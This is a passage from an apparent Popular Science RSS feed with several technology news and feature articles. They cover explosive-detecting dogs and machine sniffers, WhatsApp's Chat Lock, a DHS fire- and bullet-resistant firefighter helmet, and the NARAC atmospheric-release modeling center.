Last year, the IRS found itself facing a barrage of criticisms after announcing, then walking back, a new policy that would have required US citizens to submit a selfie via ID.me to access their tax information. ID.me is a third-party verification service used extensively by state and federal organizations, as well as private companies for proofing, authentication and group affiliations via a combination of photo uploads and video chat confirmations. Using ID.me is currently one of multiple verification options for the IRS. It is unclear if such a process will be mandatory within a future federal free filing portal. Both the IRS and the US Treasury Department have not responded to requests for clarification at the time of writing.

The post A free IRS e-filing tax service could start rolling out next year appeared first on Popular Science.

Articles may contain affiliate links which enable us to share in the revenue of any purchases made.

]]>
No machine can beat a dog’s bomb-detecting sniffer https://www.popsci.com/story/technology/dogs-bomb-detect-device/ Mon, 18 Mar 2019 21:21:29 +0000 https://www.popsci.com/uncategorized/dogs-bomb-detect-device/
A Labrador retriever smelling for explosives with a member of a bomb squad at the trial of the 2015 Boston Marathon bomber
A bomb-sniffing dog walks in front of a courthouse during the 2015 trial for accused Boston Marathon bomber Dzhokhar Tsarnaev. Matt Stone/MediaNews Group/Boston Herald via Getty Images

Dogs are the best bomb detectors we have. Can scientists do better?

The post No machine can beat a dog’s bomb-detecting sniffer appeared first on Popular Science.

]]>
A Labrador retriever smelling for explosives with a member of a bomb squad at the trial of the 2015 Boston Marathon bomber
A bomb-sniffing dog walks in front of a courthouse during the 2015 trial for accused Boston Marathon bomber Dzhokhar Tsarnaev. Matt Stone/MediaNews Group/Boston Herald via Getty Images

This story was first published on June 3, 2013. It covered the most up-to-date technology in bomb detection at the time, with a focus on research based off canine olfaction. Today, dogs still hold an edge to chemical sensors with their noses: They’ve even been trained to sniff out bed bugs, the coronavirus, and homemade explosives like HMTDs.

IT’S CHRISTMAS SEASON at the Quintard Mall in Oxford, Alabama, and were it not a weekday morning, the tiled halls would be thronged with shoppers, and I’d probably feel much weirder walking past Victoria’s Secret with TNT in my pants. The explosive is harmless in its current form—powdered and sealed inside a pair of four-ounce nylon pouches tucked into the back pockets of my jeans—but it’s volatile enough to do its job, which is to attract the interest of a homeland defender in training by the name of Suge.

Suge is an adolescent black Labrador retriever in an orange DO NOT PET vest. He is currently a pupil at Auburn University’s Canine Detection Research Institute and comes to the mall once a week to practice for his future job: protecting America from terrorists by sniffing the air with extreme prejudice.

Olfaction is a canine’s primary sense. It is to him what vision is to a human, the chief input for data. For more than a year, the trainers at Auburn have honed that sense in Suge to detect something very explicit and menacing: molecules that indicate the presence of an explosive, such as the one I’m carrying.

The TNT powder has no discernible scent to me, but to Suge it has a very distinct chemical signature. He can detect that signature almost instantly, even in an environment crowded with thousands of other scents. Auburn has been turning out the world’s most highly tuned detection dogs for nearly 15 years, but Suge is part of the school’s newest and most elite program. He is a Vapor Wake dog, trained to operate in crowded public spaces, continuously assessing the invisible vapor trails human bodies leave in their wake.

Unlike traditional bomb-sniffing dogs, which are brought to a specific target—say, a car trunk or a suspicious package—the Vapor Wake dog is meant to foil a particularly nasty kind of bomb, one carried into a high traffic area by a human, perhaps even a suicidal one. In busy locations, searching individuals is logistically impossible, and fixating on specific suspects would be a waste of time. Instead, a Vapor Wake dog targets the ambient air.

As the bombing at the Boston marathon made clear, we need dogs—and their noses. As I approach the mall’s central courtyard, where its two wings of chain stores intersect, Suge is pacing back and forth at the end of a lead, nose in the air. At first, I walk toward him and then swing wide to feign interest in a table covered with crystal curios. When Suge isn’t looking, I walk past him at a distance of about 10 feet, making sure to hug the entrance of Bath & Body Works, conveniently the most odoriferous store in the entire mall. Within seconds, I hear the clattering of the dog’s toenails on the hard tile floor behind me.

As Suge struggles at the end of his lead (once he’s better trained, he’ll alert his handler to threats in a less obvious manner), I reach into my jacket and pull out a well-chewed ball on a rope—his reward for a job well done—and toss it over my shoulder. Christmas shoppers giggle at the sight of a black Lab chasing a ball around a mall courtyard, oblivious that had I been an actual terrorist, he would have just saved their lives.

That Suge can detect a small amount of TNT at a distance of 10 feet in a crowded mall in front of a shop filled with scented soaps, lotions, and perfumes is an extraordinary demonstration of the canine’s olfactory ability. But what if, as a terrorist, I’d spotted Suge from a distance and changed my path to avoid him? And what if I’d chosen to visit one of the thousands of malls, train stations, and subway platforms that don’t have Vapor Wake dogs on patrol?

Dogs may be the most refined scent-detection devices humans have, a technology in development for 10,000 years or more, but they’re hardly perfect. Graduates of Auburn’s program can cost upwards of $30,000. They require hundreds of hours of training starting at birth. There are only so many trainers and a limited supply of purebred dogs with the right qualities for detection work. Auburn trains no more than a couple of hundred a year, meaning there will always be many fewer dogs than there are malls or military units. Also, dogs are sentient creatures. Like us, they get sleepy; they get scared; they die. Sometimes they make mistakes.

As the tragic bombing at the Boston Marathon made all too clear, explosives remain an ever-present danger, and law enforcement and military personnel need dogs—and their noses—to combat them. But it also made clear that security forces need something in addition to canines, something reliable, mass-producible, and easily positioned in a multitude of locations. In other words, they need an artificial nose.

Engineer in glasses and a blue coat in front of a bomb detector mass spectrometer
David Atkinson at the Pacific Northwest National Laboratory has created a system that uses a mass spectrometer to detect the molecular weights of common explosives in air. Courtesy Pacific Northwest National Laboratory

IN 1997, DARPA created a program to develop just such a device, targeted specifically to land mines. No group was more aware than the Pentagon of the pervasive and existential threat that explosives represent to troops in the field, and it was becoming increasingly apparent that the need for bomb detection extended beyond the battlefield. In 1988, a group of terrorists brought down Pan Am Flight 103 over Lockerbie, Scotland, killing 270 people. In 1993, Ramzi Yousef and Eyad Ismoil drove a Ryder truck full of explosives into the underground garage at the World Trade Center in New York, nearly bringing down one tower. And in 1995, Timothy McVeigh detonated another Ryder truck full of explosives in front of the Alfred P. Murrah Federal Building in Oklahoma City, killing 168. The “Dog’s Nose Program,” as it was called, was deemed a national security priority.

Over the course of three years, scientists in the program made the first genuine headway in developing a device that could “sniff” explosives in ambient air rather than test for them directly. In particular, an MIT chemist named Timothy Swager honed in on the idea of using fluorescent polymers that, when bound to molecules given off by TNT, would turn off, signaling the presence of the chemical. The idea eventually developed into a handheld device called Fido, which is still widely used today in the hunt for IEDs (many of which contain TNT). But that’s where progress stalled.

Olfaction, in the most reductive sense, is chemical detection. In animals, molecules bind to receptors that trigger a signal that’s sent to the brain for interpretation. In machines, scientists typically use mass spectrometry in lieu of receptors and neurons. Most scents, explosives included, are created from a specific combination of molecules. To reproduce a dog’s nose, scientists need to detect minute quantities of those molecules and identify the threatening combinations. TNT was relatively easy. It has a high vapor pressure, meaning it releases abundant molecules into the air. That’s why Fido works. Most other common explosives, notably RDX (the primary component of C-4) and PETN (in plastic explosives such as Semtex), have very low vapor pressures—parts per trillion at equilibrium and once they’re loose in the air perhaps even parts per quadrillion.

The machine “sniffed” just as a dog would and identified the explosive molecules. “That was just beyond the capabilities of any instrumentation until very recently,” says David Atkinson, a senior research scientist at the Pacific Northwest National Laboratory, in Richland, Washington. A gregarious, slightly bearish man with a thick goatee, Atkinson is the co-founder and “perpetual co-chair” of the annual Workshop on Trace Explosives Detection. In 1988, he was a PhD candidate at Washington State University when Pan Am Flight 103 went down. “That was the turning point,” he says. “I’ve spent the last 20 years helping to keep explosives off airplanes.” He might at last be on the verge of a solution.

When I visit him in mid-January, Atkinson beckons me into a cluttered lab with a view of the Columbia River. At certain times of the year, he says he can see eagles swooping in to poach salmon as they spawn. “We’re going to show you the device we think can get rid of dogs,” he says jokingly and points to an ungainly, photocopier–size machine with a long copper snout in a corner of the lab; wires run haphazardly from various parts.

Last fall, Atkinson and two colleagues did something tremendous: They proved, for the first time, that a machine could perform direct vapor detection of two common explosives—RDX and PETN—under ambient conditions. In other words, the machine “sniffed” the vapor as a dog would, from the air, and identified the explosive molecules without first heating or concentrating the sample, as currently deployed chemical-detection machines (for instance, the various trace-detection machines at airport security checkpoints) must. In one shot, Atkinson opened a door to the direct detection of the world’s most nefarious explosives.

As Atkinson explains the details of his machine, senior scientist Robert Ewing, a trim man in black jeans and a speckled gray shirt that exactly matches his salt-and-pepper hair, prepares a demonstration. Ewing grabs a glass slide soiled with RDX, an explosive that even in equilibrium has a vapor pressure of just five parts per trillion. This particular sample, he says, is more than a year old and just sits out on the counter exposed; the point being that it’s weak. Ewing raises this sample to the snout end of a copper pipe about an inch in diameter. That pipe delivers the air to an ionization source, which selectively pairs explosive compounds with charged particles, and then on to a commercial mass spectrometer about the size of a small copy machine. No piece of the machine is especially complicated; for the most part, Atkinson and Ewing built it with off-the-shelf parts.

Ewing allows the machine to sniff the RDX sample and then points to a computer monitor where a line graph that looks like an EKG shows what is being smelled. Within seconds, the graph spikes. Ewing repeats the experiment with C-4 and then again with Semtex. Each time, the machine senses the explosive.

David Atkinson may have been first to demonstrate extremely sensitive chemical detection—and that research is all but guaranteed to strengthen terror defense—but he and other scientists still have a long way to go before they approach the sophistication of a dog nose.

A commercial version of Atkinson’s machine could have enormous implications for public safety, but to get the technology from the lab to the field will require overcoming a few hurdles. As it stands, the machine recognizes only a handful of explosives (at least nine as of April), although both Ewing and Atkinson are confident that they can work out the chemistry to detect others if they get the funding. Also, Atkinson will need to shrink it to a practical size. The current smallest version of a high-performance mass spectrometer is about the size of a laser printer—too big for police or soldiers to carry in the field. Scientists have not yet found a way to shrink the device’s vacuum pump. DARPA, Atkinson says, has funded a project to dramatically reduce the size of vacuum pumps, but it’s unclear if the work can be applied to mass spectrometry.

If Atkinson can reduce the footprint of his machine, even marginally, and refine his design, he imagines plenty of very useful applications. For instance, a version affixed to the millimeter wave booths now common at American airports (the ones that require passengers to stand with their hands in the air—also invented at PNNL, by the way) could use a tube to sniff air and deliver it to a mass spectrometer. Soldiers could also mount one to a Humvee or an autonomous vehicle that could drive up and sniff suspicious piles of rubble in situations too perilous for a human or dog. If Atkinson could reach backpack size or smaller, he may even be able to get portable versions into the hands of those who need them most: the marines on patrol in Afghanistan, the Amtrak cops guarding America’s rail stations, or the officers watching over a parade or road race.

Atkinson is not alone in his quest for a better nose. A research group at MIT is studying the use of carbon nanotubes lined with peptides extracted from bee venom that bind to certain explosive molecules. And at the French-German Research Institute in France, researcher Denis Spitzer is experimenting with a chemical detector made from micro-electromechanical machines (MEMs) and modeled on the antennae of a male silkworm moth, which are sensitive enough to detect a single molecule of female pheromone in the air.

Atkinson may have been first to demonstrate extremely sensitive chemical detection—and that research is all but guaranteed to strengthen terror defense—but he and other scientists still have a long way to go before they approach the sophistication of a dog nose. One challenge is to develop a sniffing mechanism. “With any electronic nose, you have to get the odorant into the detector,” says Mark Fisher, a senior scientist at Flir Systems, the company that holds the patent for Fido, the IED detector. Every sniff a dog takes, it processes about half a liter of air, and a dog sniffs up to 10 times per second. Fido processes fewer than 100 milliliters per minute, and Atkinson’s machine sniffs a maximum of 20 liters per minute.

Another much greater challenge, perhaps even insurmountable, is to master the mechanisms of smell itself.

German shepherd patrolling Union Station in Washington, D.C.
To condition detection dogs to crowds and unpredictable situations, such as Washington, D.C.’s Union Station at Thanksgiving [above], trainers send them to prisons to interact with inmates. Mandel Ngan/Afp/Getty Images

OLFACTION IS THE OLDEST of the sensory systems and also the least understood. It is complicated and ancient, sometimes called the primal sense because it dates back to the origin of life itself. The single-celled organisms that first floated in the primordial soup would have had a chemical detection system in order to locate food and avoid danger. In humans, it’s the only sense with its own dedicated processing station in the brain—the olfactory bulb—and also the only one that doesn’t transmit its data directly to the higher brain. Instead, the electrical impulses triggered when odorant molecules bind with olfactory receptors route first through the limbic system, home of emotion and memory. This is why smell is so likely to trigger nostalgia or, in the case of those suffering from PTSD, paralyzing fear.

All mammals share the same basic system, although there is great variance in sensitivity between species. Those that use smell as the primary survival sense, in particular rodents and dogs, are orders of magnitude better than humans at identifying scents. Architecture has a lot to do with that. Dogs are lower to the ground, where molecules tend to land and linger. They also sniff much more frequently and in a completely different way (by first exhaling to clear distracting scents from around a target and then inhaling), drawing more molecules to their much larger array of olfactory receptors. Good scent dogs have 10 times as many receptors as humans, and 35 percent of the canine brain is devoted to smell, compared with just 5 percent in humans.

Unlike hearing and vision, both of which have been fairly well understood since the 19th century, scientists first explained smell only 50 years ago. “In terms of the physiological mechanisms of how the system works, that really started only a few decades ago,” says Richard Doty, director of the Smell and Taste Center at the University of Pennsylvania. “And the more people learn, the more complicated it gets.”

Whereas Atkinson’s vapor detector identifies a few specific chemicals using mass spectrometry, animal systems can identify thousands of scents that are, for whatever reason, important to their survival. When molecules find their way into a nose, they bind with olfactory receptors that dangle like upside-down flowers from a sheet of brain tissue known as the olfactory epithelium. Once a set of molecules links to particular receptors, an electrical signal is sent through axons into the olfactory bulb and then through the limbic system and into the cortex, where the brain assimilates that information and says, “Yum, delicious coffee is nearby.”

While dogs are fluent in the mysterious language of smell, scientists are only now learning the ABC’s.As is the case with explosives, most smells are compounds of chemicals (only a very few are pure; for instance, vanilla is only vanillin), meaning that the system must pick up all those molecules together and recognize the particular combination as gasoline, say, and not diesel or kerosene. Doty explains the system as a kind of code, and he says, “The code for a particular odor is some combination of the proteins that get activated.” To create a machine that parses odors as well as dogs, science has to unlock the chemical codes and program artificial receptors to alert for multiple odors as well as combinations.

In some ways, Atkinson’s machine is the first step in this process. He’s unlocked the codes for a few critical explosives and has built a device sensitive enough to detect them, simply by sniffing the air. But he has not had the benefit of many thousands of years of bioengineering. Canine olfaction, Doty says, is sophisticated in ways that humans can barely imagine. For instance, humans don’t dream in smells, he says, but dogs might. “They may have the ability to conceptualize smells,” he says, meaning that instead of visualizing an idea in their mind’s eye, they might smell it.

Animals can also convey metadata with scent. When a dog smells a telephone pole, he’s reading a bulletin board of information: which dogs have passed by, which ones are in heat, etc. Dogs can also sense pheromones in other species. The old adage is that they can smell fear, but scientists have proved that they can smell other things, like cancer or diabetes. Gary Beauchamp, who heads the Monell Chemical Senses Center in Philadelphia, says that a “mouse sniffing another mouse can obtain much more information about that mouse than you or I could by looking at someone.”

If breaking chemical codes is simple spelling, deciphering this sort of metadata is grammar and syntax. And while dogs are fluent in this mysterious language, scientists are only now learning the ABC’s.

Dog in an MRI machine with computer screens in front
Paul Waggoner at Auburn University treats dogs as technology. He studies their neurological responses to olfactory triggers with an MRI machine. Courtesy Auburn Canine Detection Institute

THERE ARE FEW people who better appreciate the complexities of smell than Paul Waggoner, a behavioral scientist and the associate director of Auburn’s Canine Research Detection Institute. He has been hacking the dog’s nose for more than 20 years.

“By the time you leave, you won’t look at a dog the same way again,” he says, walking me down a hall where military intelligence trainees were once taught to administer polygraphs and out a door and past some pens where new puppies spend their days. The CRDI occupies part of a former Army base in the Appalachian foothills and breeds and trains between 100 and 200 dogs—mostly Labrador retrievers, but also Belgian Malinois, German shepherds, and German shorthaired pointers—a year for Amtrak, the Department of Homeland Security, police departments across the US, and the military. Training begins in the first weeks of life, and Waggoner points out that the floor of the puppy corrals is made from a shiny tile meant to mimic the slick surfaces they will encounter at malls, airports, and sporting arenas. Once weaned, the puppies go to prisons in Florida and Georgia, where they get socialized among prisoners in a loud, busy, and unpredictable environment. And then they come home to Waggoner.

What Waggoner has done over tens of thousands of hours of careful study is begin to quantify a dog’s olfactory abilities. For instance, how small a sample dogs can detect (parts per trillion, at least); how many different types of scents they can detect (within a certain subset, explosives for instance, there seems to be no limit, and a new odor can be learned in hours); whether training a dog on multiple odors degrades its overall detection accuracy (typically, no); and how certain factors like temperature and fatigue affect performance.

The idea that the dog is a static technology just waiting to be obviated really bothers Waggoner, because he feels like he’s innovating every bit as much as Atkinson and the other lab scientists. “We’re still learning how to select, breed, and get a better dog to start with—then how to better train it and, perhaps most importantly, how to train the people who operate those dogs.”

Waggoner even taught his dogs to climb into an MRI machine and endure the noise and tedium of a scan. If he can identify exactly which neurons are firing in the presence of specific chemicals and develop a system to convey that information to trainers, he says it could go a long way toward eliminating false alarms. And if he could get even more specific—whether, say, RDX fires different cells than PETN—that information might inform more targeted responses from bomb squads.

The idea that the dog is a static technology just waiting to be obviated really bothers Paul Waggoner.

After a full day of watching trainers demonstrate the multitudinous abilities of CRDI’s dogs, Waggoner leads me back to his sparsely furnished office and clicks a video file on his computer. It was from a lecture he’d given at an explosives conference, and it featured Major, a yellow lab wearing what looked like a shrunken version of the Google Street View car array on its back. Waggoner calls this experiment Autonomous Canine Navigation. Working with preloaded maps, a computer delivered specific directions to the dog. By transmitting beeps that indicated left, right, and back, it helped Major navigate an abandoned “town” used for urban warfare training. From a laptop, Waggoner could monitor the dog’s position using both cameras and a GPS dot, while tracking its sniff rate. When the dog signaled the presence of explosives, the laptop flashed an alert, and a pin was dropped on the map.

It’s not hard to imagine this being very useful in urban battlefield situations or in the case of a large area and a fast-ticking clock—say, an anonymous threat of a bomb inside an office building set to detonate in 30 minutes. Take away the human and the leash, and a dog can sweep entire floors at a near sprint. “To be as versatile as a dog, to have all capabilities in one device, might not be possible,” Waggoner says.

Both the dog people and the scientists working to emulate the canine nose have a common goal: to stop bombs from blowing up. It’s important to recognize that both sides—the dog people and the scientists working to emulate the canine nose—have a common goal: to stop bombs from blowing up. And the most effective result of this technology race, Waggoner thinks, is a complementary relationship between dog and machine. It’s impractical, for instance, to expect even a team of Vapor Wake dogs to protect Grand Central Terminal, but railroad police could perhaps one day install a version of Atkinson’s sniffer at that station’s different entrances. If one alerts, they could call in the dogs.

There’s a reason Flir Systems, the maker of Fido, has a dog research group, and it’s not just for comparative study, says the man who runs it, Kip Schultz. “I think where the industry is headed, if it has forethought, is a combination,” he told me. “There are some things a dog does very well. And some things a machine does very well. You can use one’s strengths against the other’s weaknesses and come out with a far better solution.”

Despite working for a company that is focused mostly on sensor innovation, Schultz agrees with Waggoner that we should be simultaneously pushing the dog as a technology. “No one makes the research investment to try to get an Apple approach to the dog,” he says. “What could he do for us 10 or 15 years from now that we haven’t thought of yet?”

On the other hand, dogs aren’t always the right choice; they’re probably a bad solution for screening airline cargo, for example. It’s a critical task, but it’s tedious work sniffing thousands of bags per day as they roll by on a conveyor belt. There, a sniffer mounted over the belt makes far more sense. It never gets bored.

“The perception that sensors will put dogs out of business—I’m telling you that’s not going to happen,” Schultz told me, at the end of a long conference call. Mark Fisher, who was also on the line, laughed. “Dogs aren’t going to put sensors out of business either.”

Read more PopSci+ stories.

The post No machine can beat a dog’s bomb-detecting sniffer appeared first on Popular Science.

Articles may contain affiliate links which enable us to share in the revenue of any purchases made.

]]>
WhatsApp released a super-secure new feature for private messages https://www.popsci.com/technology/whatsapp-chat-lock/ Mon, 15 May 2023 19:00:00 +0000 https://www.popsci.com/?p=541263
Close-up of WhatsApp home screen on smartphone
Conversations can now be locked via password and biometric entry. Deposit Photos

'Chat Lock' creates a password- and biometric-locked folder for your most sensitive convos.

The post WhatsApp released a super-secure new feature for private messages appeared first on Popular Science.

]]>
Close-up of WhatsApp home screen on smartphone
Conversations can now be locked via password and biometric entry. Deposit Photos

WhatsApp just got a new feature bolstering its long-standing emphasis on users’ privacy: a “Chat Lock” feature that squirrels away your most confidential conversations.

Much like Apple’s hidden photos option, Chat Lock allows users to create a separate folder for private discussions; it’s protected by either password or biometric access. Any conversations filed within WhatsApp’s Chat Lock section also will block both sender and text in their push notifications, resulting in a simple “New Message” button. According to WhatsApp’s owners at Meta, Chat Lock could prove useful for those “who have reason to share their phones from time to time with a family member or those moments where someone else is holding your phone at the exact moment an extra special chat arrives.”

[Related: WhatsApp users can now ghost group chats and delete messages for days.]

To enable the new feature, WhatsApp users simply need to tap the name of a one-to-one or group message and select the lock option. To see those classified conversations, just slowly pull down on the inbox icon, then input the required password or biometric information to unlock. According to WhatsApp, Chat Lock capabilities are set to expand even further over the next few months, including features like locking messages on companion devices and creating custom passwords for each chat on a single phone.

Chat Lock is only the latest in a number of updates to come to the world’s most popular messaging app. Earlier this month, WhatsApp introduced multiple updates to its polling feature, including single-vote polls, a search option, and notifications for when people cast their votes. The platform also recently introduced the ability to forward media and documents with captions for context.

[Related: 3 ways to hide photos and files on your phone.]

Although it has long billed itself as a secure messaging alternative to standard platforms such as Apple’s iMessage (both WhatsApp and iMessage use end-to-end encryption, as do some other apps), WhatsApp experienced a sizable user backlash in 2021 when it changed its privacy policy to allow for more personal data sharing with its parent company, Meta. Meanwhile, other privacy-focused apps like Signal and Telegram remain popular alternatives.

The post WhatsApp released a super-secure new feature for private messages appeared first on Popular Science.

Articles may contain affiliate links which enable us to share in the revenue of any purchases made.

]]>
The US is seeking a firefighter helmet that protects against flames and bullets https://www.popsci.com/technology/firefighter-helmet-bullet-resistant/ Fri, 12 May 2023 14:00:00 +0000 https://www.popsci.com/?p=540735
A firefighter training scenario at Naval Station Great Lakes in April, 2023.
A firefighter training scenario at Naval Station Great Lakes in April, 2023. Cory Asato / US Navy

Firefighters have a job that can involve responding to scenes with active shooters.

The post The US is seeking a firefighter helmet that protects against flames and bullets appeared first on Popular Science.

]]>
A firefighter training scenario at Naval Station Great Lakes in April, 2023.
A firefighter training scenario at Naval Station Great Lakes in April, 2023. Cory Asato / US Navy

Later this year, the Department of Homeland Security hopes to provide a new prototype helmet for firefighters, a piece of gear designed to meet modern challenges in one flexible, composite form. Firefighting is dangerous work, even when it’s narrowly focused on fires, but as first responders firefighters handle a range of crises, including ones where the immediate threat may be more from firearms than flame. To meet that need, the Department of Homeland Security’s Science and Technology directorate is funding a new, all-purpose helmet for firefighters that will include both protection from bullets and fire.

“Firefighters are increasingly called upon to respond to potentially violent situations (PVS), including active shooters, armed crowd and terrorist incidents, hazardous materials mitigation, and disaster response,” reads a Homeland Security scouting report published in July 2019, outlining the needs and limits of existing helmet models. “Currently, firefighters must carry one helmet for fire protection and one helmet for ballistic protection, which creates a logistical burden when firefighters must switch gear on the scene.” 

Relying on two distinct helmets for two distinct kinds of response is not an efficient setup, and it means that if a firefighter is responding to one kind of emergency, like a shooter, but then a fire breaks out, the first helmet offers inadequate protection for the task. While dealing with shooters is and remains the primary responsibility of law enforcement, rescuing people from danger that might include a shooter is in the wheelhouse of firefighters, and so being able to do that safely despite bullets flying would improve their ability to rescue. 

Beyond survivability from both bullets and fires, Homeland Security evaluated helmets for how well they could incorporate self-contained breathing apparatus (SCBA) gear, fit integrated communications, and be able to either project light or, if lights are not baked into the helmet design, easily mount and use lights. The breathing apparatus required for indoor firefighting must work cleanly with the helmet, as without the outside air circulation like in wildfire fighting, firefighters are tasked to venture into smoke-filled rooms, sometimes containing smoke from hazardous materials. Communications equipment allows firefighters to stay in contact despite the sounds and obstructions of a building on fire, and lighting can cut through the smoke and blaze to help firefighters locate people in need of rescue.

The National Fire Protection Association sets standards for fire gear, and the ballistic standards chosen are from the National Institute of Justice’s Level 111A, which includes handgun bullets up to .44 Magnum but does not cover rifle ammunition. 

[Related: A new kind of Kevlar aims to stop bullets with less material]

In the 2019 evaluation, eight helmets met the standard for fire protection, while only one met the standard for ballistic protection. The fields of fire and ballistics protection have largely been bifurcated in design, which is partly what initiatives like funding through the Science and Technology Directorate are built to solve. In the same 2019 evaluation of existing models, no one existing helmet offered both ballistic protection alongside the other firefighting essentials sought in the program. These designs all ditch the wide brim and long tail traditionally found in firefighting helmets, as the protection offered by the helmet’s distinctive shape can be met through other means.

“The NextGen Firefighter Helmet will be designed with a shell that can absorb energy during impact and rapidly dissipates it without injuring the skull or brain. While the current materials used in both firefighter and military helmets are inadequate for the temperature and ballistic protection being sought, they provide a useful blueprint for future innovation,” said DHS in a release. “For example, Kevlar fiber has a melting point of 1040 °F and has proven highly effective in ballistic helmets and body armor. Similarly, polyester resins used in current firefighter headgear can have glass transition temperatures (the point at which it becomes hard and brittle) as high as 386.6°F. The idea is that thermosetting resins can be reinforced with Kevlar fiber, creating a shell that meets both the thermal and ballistic protection requirements of the NextGen Firefighter Helmet.”

Other important design features will be ensuring that the finished product doesn’t weigh too much or strain the necks of wearers too badly, as protective gear that injures wearers from repeated use is not helpful. That means a large-sized helmet that ideally weighs under 62 ounces, and in a medium size is under 57 oz. The helmet will need to be simple to put on, taking less than a minute from start until its secure in place. 

DHS expects the prototype to be ready by mid-2023, at which point it will conduct an operational field assessment. Firefighters will evaluate the helmet design and features, and see if what was devised in a lab and a workshop can meet their in-field needs. After that, should the prototype prove successful, the process will be finding commercial makers to produce the helmets at scale, creating a new and durable piece of safety gear.

The post The US is seeking a firefighter helmet that protects against flames and bullets appeared first on Popular Science.

Articles may contain affiliate links which enable us to share in the revenue of any purchases made.

]]>
Inside the little-known group that knows where toxic clouds will blow https://www.popsci.com/technology/national-atmospheric-release-advisory-center/ Thu, 11 May 2023 11:00:00 +0000 https://www.popsci.com/?p=540401
illustration of scientist with 3D models
Ard Su

This center is in charge of modeling what happens in the atmosphere if a train derails—or a nuclear weapon explodes.

The post Inside the little-known group that knows where toxic clouds will blow appeared first on Popular Science.

]]>
illustration of scientist with 3D models
Ard Su

WHEN A NUCLEAR-POWERED satellite crashes to Earth, whom do the authorities call? What about when a derailed train spills toxic chemicals? Or when a wildfire burns within the fenceline of a nuclear-weapons laboratory? When an earthquake damages a nuclear power plant, or when it melts down? 

Though its name isn’t catchy, the National Atmospheric Release Advisory Center (NARAC) is on speed dial for these situations. If hazardous material—whether of the nuclear, radiological, biological, chemical, or natural variety—gets spewed into the atmosphere, NARAC’s job is to trace its potentially deadly dispersion. The center’s scientists use modeling, simulation, and real-world data to pinpoint where those hazards are in space and time, where the harmful elements will soon travel, and what can be done.

The landscape of emergency response

NARAC is part of Lawrence Livermore National Laboratory in California, which is run by the National Nuclear Security Administration, which itself is part of the Department of Energy—the organization in charge of, among other things, developing and maintaining nuclear weapons. 

Plus, NARAC is part of a group called NEST, or the Nuclear Emergency Support Team. That team’s goal is to both prevent and respond to nuclear and radiological emergencies—whether they occur by accident or on purpose. Should a dirty bomb be ticking in Tempe, they’re the ones who would search for it. Should they not find it in time, they would also help deal with the fallout. In addition, NEST takes preventative measures, like flying radiation-detecting helicopters over the Super Bowl to make sure no one has poisonous plans. “That’s a very compelling national mission,” says Lee Glascoe, the program leader for LLNL’s contribution to NEST, which includes NARAC. “And NARAC is a part of that.”

And if a suspicious substance does get released into the atmosphere, NARAC’s job is to provide information that NEST personnel can use in the field and authorities can use to manage catastrophe. Within 15 minutes of a notification about toxic materials in the air, NARAC can produce a 3D simulation of the general situation: what particles are expected where, where the airflow will waft them, and what the human and environmental consequences could be. 

In 30 to 60 minutes, they can push ground-level data gathered by NEST personnel (who are out in the field while the NARAC scientists are running simulations) into their supercomputers and integrate it into their models. That will give more precise and accurate information about where plumes of material are in the air, where the ground will be contaminated, where affected populations are, how many people might die or be hurt, where evacuation should occur, and how far blast damage extends. 

Modeling the atmosphere

These capabilities drifted into Lawrence Livermore decades ago. “Livermore has a long history of atmospheric modeling, from the development of the first climate model,” says John Nasstrom, NARAC’s chief scientist.

That model was built by physicist Cecil “Chuck” Leith. Leith, back in the early Cold War, got permission from lab director Edward Teller (who co-founded the lab and was a proponent of the hydrogen bomb) to use early supercomputers to develop and run the first global atmospheric circulation model. Glascoe calls this effort “the predecessor for weather modeling and climate modeling.” The continuation of Leith’s work split into two groups at Livermore: one focused on climate and one focused on public health—the common denominator between the two being how the atmosphere works. 

In the 1970s, the Department of Energy came to the group focused on public health and asked, says Nasstrom, whether the models could show in near real time where hazardous material would travel once released. Livermore researchers took that project on in 1973, working on a prototype that during a real event could tell emergency managers at DOE sites (home to radioactive material) and nuclear power plants who would get how much of a dose and where.

The group was plugging along on that project when the real world whirled against its door. In 1979, a reactor at the Three Mile Island nuclear plant in Pennsylvania partially melted down. “They jumped into it,” Nasstrom says of his predecessors. The prototype system wasn’t yet fully set up, but the team immediately started to build in 3D information about the terrain around Three Mile Island to get specific predictions about the radionuclides’ whereabouts and effects.

After that near catastrophe, the group began preemptively building that terrain data in for other DOE and nuclear sites before moving on to the whole rest of the US and incorporating real-time meteorological data. “Millions of weather observations today are streaming into our center right now,” says Nasstrom, “as well as global and regional forecast model output from NOAA [the National Oceanic and Atmospheric Administration], the National Weather Service, and other agencies.” 

NARAC also evolved with the 1986 Chernobyl accident. “People anticipated that safety systems would be in place and catastrophic releases wouldn’t necessarily happen,” says Nasstrom. “Then Chernobyl went wrong, and we quickly developed a much larger-scale modeling system that could transport material around the globe.” Previously, they had focused on the consequences at a more regional level, but Chernobyl lofted its toxins around the globe, necessitating an understanding of that planetary profusion.

“It’s been in a continuous state of evolution,” says Nasstrom, of NARAC’s modeling and simulation capabilities. 

‘All the world’s terrain mapped out’

Today, NARAC uses high-resolution weather models from NOAA as well as forecast models it helped develop. Every day, the center brings in more than a terabyte of weather forecast model data. And those 3D topography maps they previously had to scramble to make are all taken care of. “We already have all the world’s terrain mapped out,” says Glascoe. 

NARAC also keeps up-to-date population information, including how the distribution of people in a city differs between day and night, and data on the buildings in cities, whose architecture changes airflow. That’s on top of land-use information, since whether an area is made up of plains or forest changes the analysis. All of that together helps scientists figure out what a given hazardous release will mean to actual people in actual locations around actual buildings.

Helping bring all those inputs together, NARAC scientists have also created ready-to-go models specific to different kinds of emergencies, such as nuclear power plant failures, dirty bomb detonations, plumes of biological badness, and actual nuclear weapons explosions. “So that as soon as something happens, we can say, ‘Oh, it’s something like this,’ that we got something to start with.” 

Katie Lundquist, a scientist specializing in scientific computing and computational fluid dynamics, is NARAC’s modeling team lead. Her team helps develop the models that underlie NARAC’s analysis, and right now it is working to improve understanding of how debris would be distributed in the mushroom cloud after a nuclear detonation and how radioactive material would mix with the debris. She’s also working on general weather modeling and making sure the software is all up to snuff for next-generation exascale supercomputers. 

“The atmosphere is really complex,” Lundquist says. “It covers a lot of scales, from a global scale down to just tiny little eddies that might be between buildings in an area. And so it takes a lot of computing power.”

NARAC has also striven to improve its communications game. “The authorities make the decision, but in a crisis, you can’t just give them all the information you’ve generated technically,” Glascoe says. “You can’t give them all sorts of pretty images of a plume.” They want one or two pages telling them only what the potential impact is. “And what sort of guidelines might help their decision making of whether people should shelter, evacuate, that sort of thing,” says Glascoe. 

